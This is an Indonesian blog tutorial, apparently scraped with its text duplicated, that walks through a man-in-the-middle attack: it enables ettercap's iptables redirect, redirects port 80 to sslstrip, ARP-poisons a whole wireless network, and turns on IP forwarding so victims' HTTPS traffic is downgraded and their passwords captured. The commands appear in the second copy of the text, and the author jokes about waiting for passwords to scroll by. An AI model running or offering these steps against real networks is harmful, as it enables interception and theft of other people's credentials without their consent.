Sniffing menggunakan sslstrip dengan ettercap.
Selamat siang salam sejahtera untuk kita semua, tanp basa basi langsung aja...
Langkah pertama download ettercapnya, kalo udah punya yang enggak usah ehehe,
langkah selanjutnya download sslstripnya caranya DISINI .
Kalo sudah kita lanjutkan perintah-perintahnya..
Buka terminal/konsole .ketikan ..
Kemudian kita edit dulu konfigurasinya menggunakan editor nano. dan pada bagian redir_command kita hilangkan tanda pagar di bagian iptables agar ettercap mengaktifkan fungsi redir_command
kalo sudah kita tutup dan save dengan menekan CTRL + x kemudian memilih Y dan ENTER, kemudian melakukan setting pada firewall kita agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS korban ke HTTP, dengan perintah
selanjutnya kita aktifkan sslstrip di tab konsole baru dengan perintah
kemudian kita aktifkan ettercap di tab baru sebagai penjaring password dan alat untuk melakukan poisoning ARP, dibagian inilah yang membedakan antara sniffing 1 target dan sniffing massal, dengan perintah
dimana opsi -i wlan0 adalah opsi untuk memilih jenis interface yang kita gunakan, saya menggunakan koneksi wireless, jadi saya menggunakan wlan0
Selanjutnya pada bagian utamanya yang tidak boleh kita lupakan adalah ip_forward dengan perintah di TAB konsole baru untuk menghindari kesalahan yang sering terjadi pada saat memberikan perintah ini di awalan sebelum konfigurasi pada firewall:
ok deh.. udah cukup jelas kan penjelasan yang saya berikan??
kalian tinggal tunggu aja password berkeliaran dimonitor kalian..hehehe.
kalo kurang jelas silahkan comment dibawah ini..!!
Langkah pertama download ettercapnya, kalo udah punya yang enggak usah ehehe,
langkah selanjutnya download sslstripnya caranya DISINI .
Kalo sudah kita lanjutkan perintah-perintahnya..
Buka terminal/konsole .ketikan ..
root@johannes:~# nano /etc/etter.conf
Kemudian kita edit dulu konfigurasinya menggunakan editor nano. dan pada bagian redir_command kita hilangkan tanda pagar di bagian iptables agar ettercap mengaktifkan fungsi redir_command
# if you use iptables:
redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport
redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport$
kalo sudah kita tutup dan save dengan menekan CTRL + x kemudian memilih Y dan ENTER, kemudian melakukan setting pada firewall kita agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS korban ke HTTP, dengan perintah
root@boiem:~# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000
selanjutnya kita aktifkan sslstrip di tab konsole baru dengan perintah
root@johannes:~# sslstrip -a -k -f
kemudian kita aktifkan ettercap di tab baru sebagai penjaring password dan alat untuk melakukan poisoning ARP, dibagian inilah yang membedakan antara sniffing 1 target dan sniffing massal, dengan perintah
root@johannes:~# ettercap -T -q -i wlan0 -M ARP // //
dimana opsi -i wlan0 adalah opsi untuk memilih jenis interface yang kita gunakan, saya menggunakan koneksi wireless, jadi saya menggunakan wlan0
Selanjutnya pada bagian utamanya yang tidak boleh kita lupakan adalah ip_forward dengan perintah di TAB konsole baru untuk menghindari kesalahan yang sering terjadi pada saat memberikan perintah ini di awalan sebelum konfigurasi pada firewall:
root@johannes:~# echo 1 > /proc/sys/net/ipv4/ip_forward
ok deh.. udah cukup jelas kan penjelasan yang saya berikan??
kalian tinggal tunggu aja password berkeliaran dimonitor kalian..hehehe.
kalo kurang jelas silahkan comment dibawah ini..!!
0 komentar: